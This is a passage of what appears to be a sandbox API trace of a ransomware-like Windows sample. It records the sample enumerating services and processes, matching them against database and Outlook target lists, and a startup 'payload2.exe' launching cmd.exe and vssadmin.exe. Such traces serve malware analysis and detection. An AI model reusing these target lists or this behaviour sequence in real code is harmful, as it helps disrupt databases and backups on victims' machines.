(lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0042.261] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0042.261] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0042.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0042.261] lstrlenW (lpString="Themes") returned 6 [0042.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0042.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0042.261] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0042.261] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0042.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0042.261] lstrlenW (lpString="TrkWks") returned 6 [0042.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0042.262] lstrlenW (lpString="UxSms") returned 5 [0042.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0042.262] lstrlenW (lpString="VSS") returned 3 [0042.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0042.262] lstrlenW (lpString="WdiServiceHost") returned 14 [0042.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0042.262] lstrlenW (lpString="WdiSystemHost") returned 13 [0042.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0042.262] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0042.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0042.262] lstrlenW (lpString="Winmgmt") returned 7 [0042.262] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0042.262] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0042.262] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0042.262] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0042.262] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0042.263] lstrlenW (lpString="WPDBusEnum") returned 10 [0042.263] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.263] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0042.263] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0042.263] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0042.263] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0042.263] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3943b50 | out: hHeap=0x600000) returned 1 [0042.263] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184 [0042.264] Process32FirstW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0042.265] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0042.266] lstrlenW (lpString="System") returned 6 [0042.266] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0042.266] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0042.266] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0042.266] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0042.266] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0042.266] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0042.266] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0042.266] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0042.266] lstrlenW (lpString="smss.exe") returned 8 [0042.266] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0042.266] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0042.266] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0042.266] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0042.266] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0042.266] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0042.266] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0042.266] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.267] lstrlenW (lpString="csrss.exe") returned 9 [0042.267] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0042.267] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0042.267] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0042.267] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0042.267] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0042.267] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0042.267] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0042.267] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0042.268] lstrlenW (lpString="wininit.exe") returned 11 [0042.268] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0042.268] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0042.268] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0042.268] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0042.268] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0042.268] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0042.268] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0042.268] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0042.269] lstrlenW (lpString="csrss.exe") returned 9 [0042.269] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0042.269] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0042.270] lstrlenW (lpString="winlogon.exe") returned 12 [0042.270] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0042.270] lstrlenW (lpString="services.exe") returned 12 [0042.270] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0042.271] lstrlenW (lpString="lsass.exe") returned 9 [0042.271] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0042.272] lstrlenW (lpString="lsm.exe") returned 7 [0042.272] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.272] lstrlenW (lpString="svchost.exe") returned 11 [0042.272] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.273] lstrlenW (lpString="svchost.exe") returned 11 [0042.273] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.273] lstrlenW (lpString="svchost.exe") returned 11 [0042.274] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.274] lstrlenW (lpString="svchost.exe") returned 11 [0042.274] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.275] lstrlenW (lpString="svchost.exe") returned 11 [0042.275] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0042.276] lstrlenW (lpString="audiodg.exe") returned 11 [0042.276] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.276] lstrlenW (lpString="svchost.exe") returned 11 [0042.276] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.277] lstrlenW (lpString="svchost.exe") returned 11 [0042.277] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0042.277] lstrlenW (lpString="dwm.exe") returned 7 [0042.278] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0042.278] lstrlenW (lpString="explorer.exe") returned 12 [0042.278] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0042.279] lstrlenW (lpString="spoolsv.exe") returned 11 [0042.279] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.279] lstrlenW (lpString="taskhost.exe") returned 12 [0042.279] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0042.280] lstrlenW (lpString="svchost.exe") returned 11 [0042.280] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0042.281] lstrlenW (lpString="taskeng.exe") returned 11 [0042.281] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0042.281] lstrlenW (lpString="taskhost.exe") returned 12 [0042.281] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0042.282] lstrlenW (lpString="challenging.exe") returned 15 [0042.282] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0042.283] lstrlenW (lpString="pgp prix.exe") returned 12 [0042.283] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0042.283] lstrlenW (lpString="user-reno.exe") returned 13 [0042.283] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0042.284] lstrlenW (lpString="aggregate.exe") returned 13 [0042.284] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0042.285] lstrlenW (lpString="dressed.exe") returned 11 [0042.285] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0042.285] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0042.285] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0042.286] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0042.286] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0042.286] lstrlenW (lpString="developing.exe") returned 14 [0042.286] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0042.479] lstrlenW (lpString="supported.exe") returned 13 [0042.479] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0042.480] lstrlenW (lpString="girlstionselect.exe") returned 19 [0042.480] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0042.481] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0042.481] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0042.481] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0042.481] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0042.482] lstrlenW (lpString="eating.exe") returned 10 [0042.482] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0042.483] lstrlenW (lpString="nh_protected.exe") returned 16 [0042.483] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0042.483] lstrlenW (lpString="vulnerability.exe") returned 17 [0042.483] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0042.484] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0042.484] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0042.485] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0042.485] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0042.485] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0042.485] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0042.486] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0042.486] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0042.487] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0042.487] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0042.488] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0042.488] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0042.488] lstrlenW (lpString="cmd.exe") returned 7 [0042.488] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0042.489] lstrlenW (lpString="conhost.exe") returned 11 [0042.489] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0042.489] lstrlenW (lpString="vssadmin.exe") returned 12 [0042.490] Process32NextW (in: hSnapshot=0x184, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0042.490] CloseHandle (hObject=0x184) returned 1 [0042.490] Sleep (dwMilliseconds=0x1f4) [0043.190] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680350 [0043.191] EnumServicesStatusExW (in: hSCManager=0x680350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0043.191] GetLastError () returned 0xea [0043.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x123e) returned 0x3943b50 [0043.191] EnumServicesStatusExW (in: hSCManager=0x680350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3943b50, cbBufSize=0x123e, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3943b50, pcbBytesNeeded=0x215ff44, 